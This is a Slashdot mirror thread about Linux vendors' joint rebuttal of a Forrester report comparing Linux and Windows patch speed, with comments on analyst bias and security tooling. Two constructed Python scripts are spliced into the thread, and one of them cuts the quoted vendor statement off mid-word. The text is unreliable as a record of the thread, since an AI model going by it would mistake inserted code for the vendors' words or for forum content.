Slashdot Mirror


Linux Distributions Respond to Forrester

dave writes "GNU/Linux vendors Debian, Mandrake, Red Hat, and SUSE have joined together to give a common statement about the Forrester report entitled "Is Linux more Secure than Windows?". Despite the report's claim to incorporate a qualitative assessment of vendor reactions to serious vulnerabilities, it treats all vulnerabilities as equal, regardless of their risk to users. As a result, the conclusions drawn by Forrester have extremely limited real-world value for customers assessing the practical issue of how quickly serious vulnerabilities get fixed."

262 comments

  1. IT Research shops by Anonymous Coward · · Score: 5, Interesting

    WTF? Why does anyone buy shit from these people.

    The executive management of the agency that I work for pays Meta $500/hr to evaluate project plans... they always rubber stamp whatever answer the execs want.

    1. Re:IT Research shops by Anonymous Coward · · Score: 5, Insightful

      > The executive management of the agency that I work for pays Meta $500/hr to evaluate project plans... they always rubber stamp whatever answer the execs want.

      And then when the project fails, they can go to the higher-ups or shareholders and say "See, the plan was sound, it was that Anonymous little shit down in IT that screwed it up. Lay him/her off and ship the job to India!"

      Then they all go celebrate their cost-cutting with booze and hookers, whilst lighting their cigars with $100 bills.

    2. Re:IT Research shops by Anonymous Coward · · Score: 0

      How did this get modded 'interesting?'

      It is just mindless anti-management, anti-outsourcing, "I hate the bastards above the rules" bullshit. It is probably true, but Interesting, it is not.

      I should know, I wrote it.

    3. Re:IT Research shops by Anonymous Coward · · Score: 0
      > I should know, I wrote it.

      Bullshit you stupid twerp, I *FUCKING* wrote it. Now push the fuck off and write your own trolls.

    4. Re:IT Research shops by ron_ivi · · Score: 3, Informative
      Forrester are the same goofballs that claim Sun Erases Doubts About Its Viability by becoming another SCO-like pawn in Microsoft's Linux war. It's an expensive subscription, so it's easier & cheaper to read Cnet's spin on the Forrester report instead, which claims "These moves remove doubts about Sun's viability by bolstering Solaris".

      Their logic seems to be windows IP will bolster Solaris!?! Wow.

      Betcha microsoft or some exec who gets a bonus paid for that report.

  2. no way! by Anonymous Coward · · Score: 5, Funny

    I'm sorry, but I simply can't believe that a research company, a company DEVOTED TO RESEARCH, would come out with biased opinions influenced by money.

    1. Re:no way! by Frizzle+Fry · · Score: 0, Insightful
      > I'm sorry, but I simply can't believe that a research company, a company DEVOTED TO RESEARCH, would come out with biased opinions influenced by money.

      Yes, let's instead listen to the unbiased people at Debian, Mandrake, Red Hat, and SUSE. Surely their opinions on this issue are less biased than those of the research company.
      --
      I'd rather be lucky than good.
    2. Re:no way! by TempusMagus · · Score: 2, Insightful

      Uh, Troll-boy. These companies are DEVOTED TO MAKING MONEY not research. RESEARCH just happens to be the product they are selling.

      --
      -_-
    3. Re:no way! by AsimovBesterClarke · · Score: 2, Insightful

      > Yes, let's instead listen to the unbiased people at Debian, Mandrake, Red Hat, and SUSE. Surely their opinions on this issue are less biased than those of the research company.

      And are these companies hiding this bias? There is no question what their agenda is (well, I suppose if one was an utter moron and didn't realize what each of these have in common). And, is the research ([sic]) company claiming to be unbiased? If I'm not mistaken, they claim to have done an independent investigation. Yet, I'm sure there are a few posts above here pointing out they are ready, willing and quite capable of producing exactly the results you pay for (and a post or two about who actually paid for these particular results).

      --
      Ads are broken.
    4. Re:no way! by agent+dero · · Score: 4, Insightful

      Was sarcasm I believe, don't drink so much coffee man

      --
      Error 407 - No creative sig found
  3. We can respond... by James+A.+M.+Joyce · · Score: 2, Insightful

    ...but will they listen?

    1. Re:We can respond... by name773 · · Score: 3, Insightful

      do we listen?

    2. Re:We can respond... by Anonymous Coward · · Score: 0

      What was that?

    3. Re:We can respond... by Jonny+Royale · · Score: 3, Interesting

      Depends if you can pay an "IT research firm" to put their name on your marketing material or not.

      BTW, here's the report....if you have 900 USD to get it:

      The Forrester Report

    4. Re:We can respond... by Anonymous Coward · · Score: 0

      The fact that someone will pay $899 to buy it implies they are looking at alternatives to Microsoft anyways ... or they'd rather go and buy another subscription for Windows or something :-)
      And well, isn't it great for a "free" product's evaluation report to get a price tag of $899!!

  4. Analyst hacks will never bit the hand that feeds by darthcamaro · · Score: 5, Insightful

    And who paid for the Forrester study?? Not Red Hat, they haven't got the cash. Probably another Microsoft funded event.
    The most dramatic thing from my point of view is that SUSE, Red Hat, Mandrake and community based Debian all got together to formulate a common reply. This is the BEST news we could ever hope for - a common, unified front - no forking when it comes to security.

  5. Slant by The_Mystic_For_Real · · Score: 1, Insightful

    The story posted here is a direct quote from the response made by the Linux representatives to the report. I think that a greater effort should be made to get news from more impartial sources or to at least warn the reader that what he is reading is from an obviously biased source regardless of whether or not it is true.

    --

    _____

    Thank you.

    1. Re:Slant by Spyro+VII · · Score: 5, Insightful

      Have you ever considered that all of the media that you read and watch is biased? And actually if you'd read the article, you'll notice that what they say is perfectly reasonable. Basically, the Forrester report was much too narrowly focused to have a fair assessment of the data. The simplicity of the initial report is actually laughable. MS fixing 100% of its bugs? Now, remember that Microsoft's code is *not* open source, so they can wait until some poor sap gets bit by a bug before they fix it. The initial report by Forrester was faulty and relied upon obscurity and simplicity to blatantly shift the report in Microsoft's favor. And before anyone says that Forrester is a research company and as such is unbiased, I recommend that you look to SCO for an example of MS's cleverness.

    2. Re:Slant by Anonymous Coward · · Score: 1

      I think the title "Linux Distributions Respond to Forrester" and the text "GNU/Linux vendors Debian, Mandrake, Red Hat, and SUSE have joined together to give a common statement" do a sufficiently good job of warning the reader of possible bias. If those two chunks don't set off slant alarms in your head, I doubt you're capable of much critical thought at all.

    3. Re:Slant by Anonymous Coward · · Score: 0

      Huh? The story is that the Linux companies are responding. Of course it makes sense to include a representative quote of their actual response. Of course it doesn't need to be stated "Since these are Linux companies they will favour Linux".

    4. Re:Slant by blackbear · · Score: 3, Insightful

      This is Slashdot. If the news wasn't a little slanted I wouldn't read it.

      Besides. It's the community take on events that I'm interested in. I can check out the wire services if I just want the news.

    5. Re:Slant by morelife · · Score: 2, Insightful

      It's Michael. What do you expect. Just be glad he didn't doctor it up a little on the emotional spin side. This will be marked flamebait, offtopic, troll in about two minutes.

      I did notice though that that is about the first full length article LX has themselves published (instead of pointing to other Linux sites) so kudos to them:)

    6. Re:Slant by kfg · · Score: 1

      > . . .at least warn the reader that what he is reading is from an obviously biased source. . .

      You mean like the first sentence?

      KFG

    7. Re:Slant by Anonymous Coward · · Score: 0

      Well, I don't think you should add a comment to the story, and we should have to wait for a more impartial source or you should, at least, warn the reader you are expressing your opinion, whether it is true or not.

      Also, please learn about things called commas. They really do help with making a point clearer.

    8. Re:Slant by Anonymous Coward · · Score: 0

      The Slashdot summary states who wrote the reply to the Forrester article - full disclosure. The reply states who wrote it - full disclosure.

      The ZD article about the Forrester report does not reveal that Microsoft funded the report. No disclosure. An appearance of impartiality is conveyed while concealing a gross conflict of interest.

      There are no impartial sources. There are only sources who acknowledge their interests, and those who conceal them. I'll take full disclosure.

      Did you complain to ZD about their failure to disclose that the Forrester report was not impartial?

    9. Re:Slant by aardvarkjoe · · Score: 5, Funny

      Well, of course the news here is slanted. Otherwise they'd have to call it "Pipedot."

      --

      How can we continue to believe in a just universe and freedom to eat crackers if we have no ale?
    10. Re:Slant by Rimbo · · Score: 1

      Ironic that you say that, considering that Microsoft sponsored the Forrester report the group is protesting against.

      Besides, uh... on what planet is Slashdot impartial? Duh.

    11. Re:Slant by Zonnald · · Score: 1

      Because....

      They didn't actual fund this report?

    12. Re:Slant by speeDDemon+(nw) · · Score: 1

      pipedot.org -> isn't that site already taken? ooops, no it's smokedot.org now. All we need is bongdot.org and we're done!

    13. Re:Slant by houghi · · Score: 1

      > Have you ever considered that all of the media that you read and watch is biased?

      Yeah. That is why there should be a media where everybody can have a say. You know, for stuff that matters. Then that media will become completely unbiased. ;-)

      --
      Don't fight for your country, if your country does not fight for you.
  6. If you think that mass-circulated study is bad... by Apostata · · Score: 2, Informative

    ...try this, from good ol' News.com: Moving to Linux May Not Save Money -- Yet.

    --

    This wasn't just plain terrible, this was fancy terrible. This was terrible with raisins in it. - Dorothy Parker
  7. just in case by Anonymous Coward · · Score: 5, Informative

    (site loads slowly. here we go in case of /.'ing)

    GNU/Linux vendors Debian, Mandrake, Red Hat, and SUSE have joined together to give a common statement about the Forrester report entitled "Is Linux more Secure than Windows?". Despite the report's claim to incorporate a qualitative assessment of vendor reactions to serious vulnerabilities, it treats all vulnerabilities as equal, regardless of their risk to users. As a result, the conclusions drawn by Forrester have extremely limited real-world value for customers assessing the practical issue of how quickly serious vulnerabilities get fixed.

    The security response teams of GNU/Linux distributors Debian, Mandrakesoft, Red Hat and SUSE have assisted Forrester in gathering and correcting data about vulnerabilities in their products. The gathered data was used at Forrester for a report that became titled "Is Linux more secure than Windows?". While the Linux vulnerability data that is the basis for the report is considered to be sufficiently accurate and useful, Debian, Mandrakesoft, Red Hat and SUSE, from now on referred to as "We", are concerned about the correctness of the conclusions made in the report.

    We believe that it is in the interest of our usership and the OpenSource community to respond to the Forrester report in the form of a common statement:

    We were approached by Forrester in February 2004 to help them refine their raw data. Forrester collected data about the vulnerabilities that affected Linux during a one year period and looked at how many days it took us to provide fixes to our users. Significant efforts have been put in not only making sure that the underlying dataset for the Linux vulnerabilities was correct, but also to articulate the special technical and organisational care taken in the response processes in the professional Open Source security field. This expertise is greatly appreciated by our usership since it adds a high value to our products, but we see that most of this value has been ignored in the methods used for the analysis of the vulnerability data, leading to erroneous conclusions.

    Our Security Response Teams and security specialized organisations of respectable reputation (such as the CERT/DHS, BSI, NIST, NISCC) exchange information about vulnerabilities and cooperate on the measures and procedures to react to them. Each vulnerability gets individually investigated and evaluated; the severity of the vulnerability is then determined by each of the individual teams based on the risk and impact as well as other, mostly technical, properties of the weakness and the software affected. This severity is then used to determine the priority at which a fix for a vulnerability is being worked on weighed against other vulnerabilities in our current queue. Our users will know that for critical flaws we can respond within hours. This prioritisation means that lower severity issues will often be delayed to let the more important issues get resolved first.

    Even though the Forrester report claims so, it does not make that distinction when it measures the time elapsed between the public knowledge of a security flaw and the availability of a vendor's fix. For each vendor the report gives just a simple average, the "All/Distribution days of risk", which gives an inconclusive picture of the reality that users experience. The average erroneously treats all vulnerabilities as equal, regardless of the risk. Not all vulnerabilities have an equal impact on all users. An attempt has been made to allocate a severity to vulnerabilities using data from a third party, however the classification of "high-severity" vulnerabilities is not sufficient: The mere announcement of a vulnerability by a particular security organisation does not necessarily make the vulnerability severe - similarly, the ability to exploit a weakness over the network (remote) is often irrelevant to the vulnerability's severity.

    We believe the report does not treat the open source vendors and single closed source vendor in th
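As an added illustration of the statement's objection to the "All/Distribution days of risk" figure (this script is not part of the vendors' statement or of this thread), the code below uses constructed advisory records and assumed severity weights to show how one flat average, or a "remote-exploitable" filter, hides the fast response on critical issues:

```python
"""
Constructed illustration: how a single "days of risk" average, and a
"remote" filter used as a severity proxy, obscure the severity-based
prioritisation the vendors describe. All records and weights are made up.
"""
from collections import defaultdict
from dataclasses import dataclass
from statistics import mean


@dataclass(frozen=True)
class Advisory:
    ident: str            # constructed placeholder id, not a real advisory
    severity: str         # vendor-assigned severity: critical/high/medium/low
    remote: bool          # exploitable over the network?
    days_of_risk: float   # days between public disclosure and vendor fix


# Constructed sample: critical issues fixed within a day, low ones queued for weeks.
SAMPLE = [
    Advisory("EXAMPLE-0001", "critical", True, 0.5),
    Advisory("EXAMPLE-0002", "critical", False, 1.0),
    Advisory("EXAMPLE-0003", "critical", True, 0.5),
    Advisory("EXAMPLE-0004", "high", True, 3.0),
    Advisory("EXAMPLE-0005", "high", False, 5.0),
    Advisory("EXAMPLE-0006", "medium", True, 10.0),
    Advisory("EXAMPLE-0007", "medium", False, 14.0),
    Advisory("EXAMPLE-0008", "low", True, 30.0),
    Advisory("EXAMPLE-0009", "low", True, 45.0),
    Advisory("EXAMPLE-0010", "low", False, 60.0),
]

# Assumed weights: how much one day of exposure "costs" at each severity.
SEVERITY_WEIGHT = {"critical": 8, "high": 4, "medium": 2, "low": 1}


def simple_average(advisories):
    """The report's figure: one mean over every advisory, severity ignored."""
    return mean(a.days_of_risk for a in advisories)


def per_severity_average(advisories):
    """What users actually experience: mean days of risk at each severity."""
    buckets = defaultdict(list)
    for a in advisories:
        buckets[a.severity].append(a.days_of_risk)
    return {sev: mean(days) for sev, days in buckets.items()}


def severity_weighted_average(advisories, weights=SEVERITY_WEIGHT):
    """Days of risk weighted by vendor-assigned severity (assumed weights)."""
    total = sum(weights[a.severity] * a.days_of_risk for a in advisories)
    return total / sum(weights[a.severity] for a in advisories)


def fraction_fixed_within(advisories, severity, max_days):
    """Share of advisories at `severity` fixed within `max_days` days."""
    subset = [a for a in advisories if a.severity == severity]
    return sum(a.days_of_risk <= max_days for a in subset) / len(subset)


def remote_only_average(advisories):
    """Mean over 'remote' issues only: the severity proxy the statement criticises.
    Low-severity remote issues still dominate the number."""
    return mean(a.days_of_risk for a in advisories if a.remote)


if __name__ == "__main__":
    print(f"flat average (report style): {simple_average(SAMPLE):.1f} days")
    print(f"remote-only average:         {remote_only_average(SAMPLE):.1f} days")
    print(f"severity-weighted average:   {severity_weighted_average(SAMPLE):.1f} days")
    for sev, days in per_severity_average(SAMPLE).items():
        print(f"  {sev:<9} mean {days:5.1f} days")
    pct = 100 * fraction_fixed_within(SAMPLE, "critical", 1.0)
    print(f"critical issues fixed within 1 day: {pct:.0f}%")
```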

    1. Re:just in case by stephanruby · · Score: 1
      "site loads slowly. here we go in case of /.'ing"

      Too little too late, this guy is going to write a story on how his site received an unexplained but highly suspicious DOS attack on April 6th through April 15th.

  8. The report and it's value by jd · · Score: 3, Troll
    Let's start by noting the existence of SARA and TARA for Unix, but not for Windows. It's hard to scan a box, locally, if you don't have the tools to do so. It's therefore correspondingly hard to fix problems under Windows.

    Then, there is the relevance of bugs. SE-Linux makes many otherwise serious glitches a mere nuisance. As do other modules in the LSM.

    There is no chroot() in Windows, to the best of my knowledge. This also changes the severity of a bug from catastrophic to irritant, in Unix.

    Finally, Nessus and SAINT are more often used to scan Unix boxes than Windows ones.

    --
    It's a small world and it smells funny; I'd buy another if it wasn't for the money; Take back what I paid (SoM)
    1. Re:The report and it's value by ajv · · Score: 4, Informative

      SARA is akin to MSBA and similar tools (some free, some not).

      Microsoft publishes extensive security checklists for various roles, and automates this process for the most likely deployment scenarios via the IIS Lockdown tool and local / group policy templates. You can manage a large fleet of computers using Group Policy in AD, so your lockdowns quickly apply to all computers, not just one.

      Nessus scans at the network level and works acceptably to find most Windows network-based vulnerabilities. I use Nessus myself when doing vulnerability assessments as a shortcut / initial pass. Nessus is not good at finding configuration or local user weaknesses. .NET supports sandboxing similar to a chroot jail if an application asks for it. Windows supports junction points, which can be used (but I've never seen used) to contain a particular application to a particular volume (which could be a virtual device, or similar).

      However, in Windows, the use of ACLs, low privilege service accounts, and utilizing fine grained privileges replaces big ass isolation required by Unix-like operating systems simply because most Unix-like OSs don't have this level of security architecture or fine grained access control.

      I don't use SAINT, so I have no comment on that.

      Just because an OS is different or you personally don't have knowledge of lockdowns, doesn't make another OS insecure. It requires bad coding practices and poor configuration to do that. Thanks to Windows' popularity, there's more than enough of this to go around.

      Andrew

      --
      Andrew van der Stock
    2. Re:The report and it's value by big+daddy+kane · · Score: 1

      > There is no chroot() in Windows, to the best of my knowledge

      One can change the environment variables in Windows; not recommended, but it can easily be accomplished. For Windows XP, go to System Properties > Advanced > Environment Variables. Then you can change, among others, the tmp and windows directories.

    3. Re:The report and it's value by Lehk228 · · Score: 1

      yea except when you do this there had damned well better be a copy of windows installed into that directory

      --
      Snowden and Manning are heroes.
    4. Re:The report and it's value by BlackHawk-666 · · Score: 1

      chroot does more than just change an environment variable. It moves the root of the drive to a new location, thus preventing you from accessing *any* files in that location. Simply changing the environment variable is only going to redirect a few apps that check for this variable, you can still read/write those directories.

      --
      All those moments will be lost in time, like tears in rain.
    5. Re:The report and it's value by Anonymous Coward · · Score: 0

      Of course linux has ACL, it's in the LSM modules, part of SE-Linux.

  9. Well by odano · · Score: 1

    Well the good news is that the people that actually care about this study are the people that understand its shortcomings and inaccuracies.

    In the long term, businesses still care about cutting costs, and linux is the way to do that.

  10. On Microsoft's Side by Henry+V+.009 · · Score: 2, Insightful

    Does anybody know of a case where someone has been attacked through a Microsoft vulnerability between the time of its going public and the release of the patch? The most often encountered scenario seems to be people who never upgrade getting attacked because hackers have reverse engineered the patches.

    1. Re:On Microsoft's Side by pholower · · Score: 4, Informative
      Mostly businesses have gotten attacked before the patch was released, but you don't hear about them because they don't release that information to let others know that they in fact have a security flaw.

      Microsoft finds their flaws in a number of ways: businesses that report them, and white hat hackers who do this for a living.

      But to answer your question a little better. If you look back at the flaws in IE, consumers, not businesses, were the ones that got attacked before the patches were out. Again, because it was a person, it is hard to track down the exact problem that occurred to them. IE has the flaws that were exploited before the patches came out. Phishing scams from the address bar.

      --
      -- johntracy.com, because everybody else is wrong.
    2. Re:On Microsoft's Side by Anonymous Coward · · Score: 0

      There was that MS SQL worm a while back. The fix was unfixed by a later patch and left you vulnerable if you were up to date.

    3. Re:On Microsoft's Side by awkScooby · · Score: 2, Informative
      > Does anybody know of a case where someone has been attacked through a Microsoft vulnerability between the time of its going public and the release of the patch? The most often encountered scenario seems to be people who never upgrade getting attacked because hackers have reverse engineered the patches.

      I think it was Stanford University that got hit with some of the RPC DCOM vulnerabilities before a patch was released. No, it wasn't one of the worms, it was hackers backdooring systems.

    4. Re:On Microsoft's Side by demaria · · Score: 1

      I guess it depends on who you ask and what you consider when you say 'businesses'. But in a poll I conducted recently, respondents cited known vulnerabilities most when asked what method of attack successfully breached security. Misconfigured settings was second.

      Biggest problem: time and manpower to test the patches before deployment.

  11. Debian's a vendor? by Anonymous Coward · · Score: 2, Insightful

    Don't vendors sell things?

    1. Re:Debian's a vendor? by Soko · · Score: 4, Informative

      Sure. So is the Fedora project (though you could call them "RedHat", and not be too far off).

      I rely on them for providing me a rock-stable, thoroughly tested distribution and any security updates to that distribution.

      I, in turn, (since I'm not a really good coder) spread the good word that these people know what they're doing. If I find a bug or security vulnerability, I report it to them ASAP. I also test out their new stuff, and report bugs and such for them, and suggest ways that they might improve their products.

      They give me something, I pay them in the currency they want. They are indeed a vendor.

      Soko

      --
      "Depression is merely anger without enthusiasm." - Anonymous
    2. Re:Debian's a vendor? by Anonymous Coward · · Score: 0

      not necessarily.

      From reference.com:

      vend v. vended, vending, vends
      1. a. To sell by means of a vending machine.
      b. To sell, especially by peddling.
      2. To offer (an idea, for example) for public consideration.

    3. Re:Debian's a vendor? by rhuntley12 · · Score: 1

      Same here, all 4 people I work with are running Sarge right now. I've also bought a set of disks from them even though I don't use it, I use the testing. It's too bad that Debian is a little bit harder to install as I had to help everyone here at work install it, although it is easy after I figured everything out since we all have the same laptops.

  12. "Secure box" by SKPhoton · · Score: 4, Interesting

    Any box in the wrong hands can become unbelievably secure, regardless of the OS.
    What would be a very interesting read would be to have sys admins lock down the box (perhaps those who do consulting for corporations) and then test how well they're set up.
    Granted, it's up to the admin at that point so have many admins on different boxes.

    1. Re:"Secure box" by BlackHawk-666 · · Score: 1

      Even a Linux box would be insecure if you installed a SQL server onto it and set the sa password to nothing - but then, who would do that...hehe.

      --
      All those moments will be lost in time, like tears in rain.
    2. Re:"Secure box" by anno1a · · Score: 1

      Uhm... "Secure this box!"

      "Ok..." *unplugs ethernet cable, and as a precaution makes iptables block everything*

      --
      ------- I fumbled my registration and I now must suffer
  13. Forrester's right, you know by ObviousGuy · · Score: 1, Insightful

    For the most part, Linux is used in the back rooms for such things as fileserving, printserving, and (especially critical for many companies) webserving. A failure on any one of these machines results in a significant risk of loss of data, company secrets, and company network infrastructure.

    A breakin on a Windows system results in the loss of local data (whose value cannot be adequately assessed, but can be assumed to be less than the sum total of all data on the servers).

    It is a little like assessing the risk of terrorism in transportation. The sheer number of automobile accidents far outweighs any risk of death due to terror attack on the highways. So too is the unlikelihood that a major terrorist attack will occur in the US skies or US rail system. However, an attack on rail cargo would be far more devastating than a similar attack on the highway system. Rail provides a very high bandwidth for cargo delivery but is also restricted to an unroutable track, so any attack on rail would essentially wipe out a very significant method of cargo transportation. On the other hand, traffic can be rerouted around any localized road problem minimizing the impact of any highway attack.

    Windows is ubiquitous on the desktop, but on these desktops are very small amounts of data compared to the large amounts located on servers. A loss due to breakin would be necessarily less significant than a similar breakin on a Linux server.

    --
    I have been pwned because my /. password was too easy to guess.
    1. Re:Forrester's right, you know by Spyro+VII · · Score: 3, Insightful

      Ummm.... So you're saying that Linux is less secure because more valuable data is stored on Linux than on Windows?

      If anything, I'd say that validates Linux's usefulness.

      Now I only wish someone could tell me what this has to do with the number of bugs...

    2. Re:Forrester's right, you know by blutrot · · Score: 2, Insightful
      > Forrester's right, you know:
      > For the most part, Linux is used in the back rooms for such things as fileserving, printserving, and (especially critical for many companies) webserving. A failure on any one of these machines results in a significant risk of loss of data, company secrets, and company network infrastructure.

      How is a Windows machine different if Windows is the server? The system goes down and you lose all data. You can run RAID in Linux just like you can with a Win server. You can do tape backups as well. You can distribute servers so that each piece of information is not held exclusively on one database. These are not Linux specific problems or Windows specific solutions.
    3. Re:Forrester's right, you know by 93+Escort+Wagon · · Score: 1

      I think you're missing the point pretty much entirely. Microsoft isn't commissioning studies like this because they're worried about Linux on the desktop - they're trying to be big-time players in the server game. There are a lot of Windows servers out there, with access to information that's just as vital as what's stored on Linux servers.

      Given that Windows' very real security problems have gotten widespread media coverage over the past year or two, now even the corporate suits are aware of them. Windows marketing folks can no longer do an end-around the tech support staff to sell directly to the higher-ups.

      With these sorts of marketing-driven studies, Microsoft is trying to convince the decision-makers that 1) Windows is more secure; and 2) Windows is cost-effective.

      I'm not saying I buy it of course - I don't. But that is what I think is going on.

      --
      #DeleteChrome
    4. Re:Forrester's right, you know by WindBourne · · Score: 1

      Of course, that had nothing to do with the report. The report never focuses on the amount or value of the data, only on how the systems security is.

      But the response is quite a bit more correct. By treating everything the same, you miss the big pix and allocate resources to minor issues.

      Most admins use a triage system in deciding how to admin a set of systems. You focus on the critical ones first, then move to non-critical. That is the same way that patches should be looked at. Give more weight to critical rather than none.

      --
      I prefer the "u" in honour as it seems to be missing these days.
    5. Re:Forrester's right, you know by BlackHawk-666 · · Score: 1
      *Sob*, sometimes even RAID 5, a journalling filesystem and a tape backup aren't enough protection. I had RAID 5 and Ext3 setup on my home server, but not the tape drive since the SCSI cable didn't fit the new box. Three months slipped past and I finally got the cable I needed, pull all my equipment out the cupboard, hooked up the tape drive again, put it all back...and the tape drive didn't work. I figured I'd get it sorted next weekend.

      By the next weekend the RAID controller lost the plot and fucked the hard drives. The journalling couldn't stop it from ruining the data since the controller is lower level. The tape backups were now three months out of date and *two* of the RAID drives were fucked. To add insult to injury the tape drive failed to start up two hours prior to me putting the case back on after installing Debian and XFS. The tape drive is now a boat anchor :-/

      I did have a CD backup of the home drives so it wasn't all doom and gloom, but it did mean loss of some data. Moral of the story, you can never have too much data protection. On the upside, I am now rid of that RedHat stuff and onto Debian. Feh, what was the point of paying for a years subscription to their update service when they end of lifed my distro?

      --
      All those moments will be lost in time, like tears in rain.
    6. Re:Forrester's right, you know by Fastolfe · · Score: 1

      > If anything, I'd say that validates Linux's usefullness.

      No disrespect, but there's a logic error here. Just because people trust it more does not necessarily mean it's more trustworthy.

      I personally agree with what you're getting at, but we shouldn't make statements like this.

    7. Re:Forrester's right, you know by blutrot · · Score: 1

      The point I was trying to make is that these types of problems are not Linux specific only. I've had similar things happen to me with RAID before. Had you been running Windows, would the same problem have occurred (considering it is at the controller level)? I agree with the fact that one can never have too much data protection, especially on mission critical devices.

  14. Money talks by Angelonio · · Score: 5, Insightful

    "Microsoft Corp., however, fixes security problems the quickest"
    how can they claim that since Micro$oft receives bug reports that are not publicly announced???
    It is easy to announce the bug along with the patch after having it hidden for 6 months...

    1. Re:Money talks by Snoopy77 · · Score: 1

      Others have called you an M$ basher but you are spot on. The OS community announces a bug and then knuckles down and fixes it. This is how it has to be done considering the developer community is a subset of the user community.

      At Microsoft, and any other closed source company for that matter, bugs can be fixed inhouse and only then announced along with a patch. This is simply the nature of closed source software.

      Interestingly, there have been occasions where people have sent bug reports to Microsoft and then months later, after seeing no action on it, have announced it publicly to force Microsoft's hand.

      --
      "She's a West Texas girl, just like me" - G.W Bush Iraqis
    2. Re:Money talks by awkScooby · · Score: 5, Informative
      Microsoft has 2 critical vulnerabilities which they have known about for 209 days. Another one they've known about for 182 days. I don't know of any open source security holes which have sat for 209 days!

      reference

      I don't buy for a minute that 1) Microsoft releases patches faster or 2) that Microsoft even gives a damn about security, except for the black eye it gives them.

  15. The cold-hard truth about Forrester and Gartner by TempusMagus · · Score: 5, Interesting

    No one buys reports from these companies to actually learn anything. The primary purpose these companies serve is to give companies objective sounding quotes to pepper their marketing material with and to convince risk averse managers that they are safely following the largest herd.

    --
    -_-
    1. Re:The cold-hard truth about Forrester and Gartner by morelife · · Score: 1

      You would not believe the amount of know-nothing corporate managers who not only pay attention to Gartner, but owe all their knowledge (what little it may be) about products and technologies to what they read there. IOW if it hasn't been covered by Gartner, it doesn't exist.

    2. Re:The cold-hard truth about Forrester and Gartner by Anarcho-Goth · · Score: 2, Insightful

      convince risk averse managers that they are safely following the largest herd.

      Unfortunately, the largest herd is heading for a cliff.

      Or would a better analogy be:

      Unfortunately, the largest herd is surrounded by a pack of wolves.

      The first is funnier, but the second is probably more accurate (IE script kiddies mostly target MS Products), and it was more along the lines of my first thought.

      --
      I hate Liberals and Conservatives.
      If you are a Liberal or a Conservative, then HAVE A NICE DAY!
      Courage.
    3. Re:The cold-hard truth about Forrester and Gartner by TempusMagus · · Score: 1

      I've seen that. Why bother with all that thinking anyway? For a small fee we can turn your prejudices into sound business reasoning and, for no extra cost, give you an expert to point at when shit turns sour. Not a bad business model.

      --
      -_-
    4. Re:The cold-hard truth about Forrester and Gartner by kwashiorkor · · Score: 1

      There are not enough moderator points that can be applied to this statement. /ditto

      --
      -- kwashiorkor --
      Leaps in Logic
      should not be confused with
      Jumping to Conclusions.
    5. Re:The cold-hard truth about Forrester and Gartner by cornjones · · Score: 1, Informative

      I only wish.

      I worked for a world-known brand that took these very seriously. They took a bunch of Jupiter reports (IIRC, they are basically the same thing). They based the whole IT strategy on these things. All handed down from the global management team "The new direction". "We will use only best of breed" (MS and Cisco) "no Linux on the desktop" (surprised me that that was mentioned specifically) and a bunch of other things that basically came directly out of a bunch of these reports.

      I think this is similar to people who watch fox news and think it is telling the whole truth. (if you have to proclaim yourself fair and balanced you probably aren't. think honest eddy at the used car dealership is honest?) These reports claim to be objective, but as other posters have pointed out, they tend to follow the money.

    6. Re:The cold-hard truth about Forrester and Gartner by $rtbl_this · · Score: 2, Interesting

      You're absolutely right. One of the first jobs I was given when I joined my current employer was to write a technical paper explaining why we should migrate from Lotus Notes to Exchange. My remit was not to do any analysis, but to provide justification for the decision our regional president had already made.

      I made a lot of use of reports from the Giga and Meta groups, coincidentally sponsored by Microsoft. In the end I had a fairly respectable looking document with lots of plausible-looking quotes that the non-technical management could use to beat up the dissenting IT managers.

      Five years on I still feel dirty. And no, before you ask, that's not because I think Notes was the better product.

      --
      "Are you being weird, or sarcastic?" said Emma. I said I didn't know because I get the two feelings mixed up.
  16. I received it in my mail and I couldn't believe it by Retype · · Score: 2, Funny

    When I started reading the mail I first thought that Debian, Red Hat, SUSE and Mandrake had got together to make faster patches to their vulnerabilities :)) Well no, I was wrong, they are just writing a response letter together :(

    Time to go back to sleep and dream of Distributions uniting forces.

    --

    I have no sig and I want to scream
  17. Oh, and one more thing... by TempusMagus · · Score: 1

    How well do you trust a company's research when they use telemarketers to try and sell it to you? I had a Forrester woman call me well over 50 times in one year about buying their reports. And of course if you pay them for a custom report, a service they offer, I'm sure your extant point of view could certainly be objectively supported.

    --
    -_-
  18. Re:Analyst hacks will never bit the hand that feed by Anonymous Coward · · Score: 2, Insightful

    Man, these guys should work together on something.

  19. Excuse me by JoeBaldwin · · Score: 3, Funny

    But when you "unbiased, fair reporting, with due impartiality to both sides of an argument", why does Slashdot immediately spring to mind?!

  20. Re:Analyst hacks will never bit the hand that feed by SKPhoton · · Score: 5, Informative

    Probably another Microsoft funded event.

    you would be correct

    From the article:
    "In 2003, Microsoft Corporation commissioned Forrester Research, Inc., to conduct a study to measure the potential market of people in the United States who are most likely to benefit from the use of accessible technology for computers."

  21. Re:Canadian involved in attempted terrorist attack? by ObviousGuy · · Score: 0, Offtopic

    My wife doesn't believe me, but I was up on Robson in Vancouver, BC and saw a dead ringer for UBL about a month before 9/11.

    Not that I'd have any idea what ultra-orthodox UBL would be doing on Robson. It doesn't seem like his kind of place.

    --
    I have been pwned because my /. password was too easy to guess.
  22. You left out a part... by Spyro+VII · · Score: 3, Informative

    [Update: Apr 6 at 7:58pm CDT... Martin Schulze from the Debian team added some more information.] Javier Fernandez-Sanguino Pena composed a survey in 2001[*] and discovered that it has taken the Debian security team an average of 35 days to fix vulnerabilities posted to the Bugtraq list. However, over 50% of the vulnerabilities were fixed in a 10-day time frame, and over 15% of them were fixed the same day the advisory was released! For this analysis, all vulnerabilities were treated the same, though. He has rerun the survey based on vulnerabilities discovered between June 1st 2002 and May 31st 2003 and found out that the median value of delays between the disclosure and releasing an advisory including a correction was 10 days (average is 13.5 days). Again, for this analysis advisories were not classified with different priorities.
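
The figures quoted above (median, average, share fixed same day or within 10 days) are easy to compute, and the caveat the post repeats, that advisories were not classified by priority, is exactly what the distributions' joint statement objects to in the Forrester report. The script below is an added example, not code from the thread or from the Debian surveys it cites: it runs the same statistics over a constructed advisory list (ids and delays invented, chosen so the overall median and average come out to the post's 10 and 13.5 days) and then breaks them down and weights them by a hypothetical severity class, to show how much the headline numbers depend on whether every advisory counts the same.

```python
"""Disclosure-to-advisory delay statistics, with and without severity.

Added example for the Slashdot thread on the Forrester report; the data is
constructed, not taken from any real advisory feed.
"""
from collections import defaultdict
from statistics import mean, median

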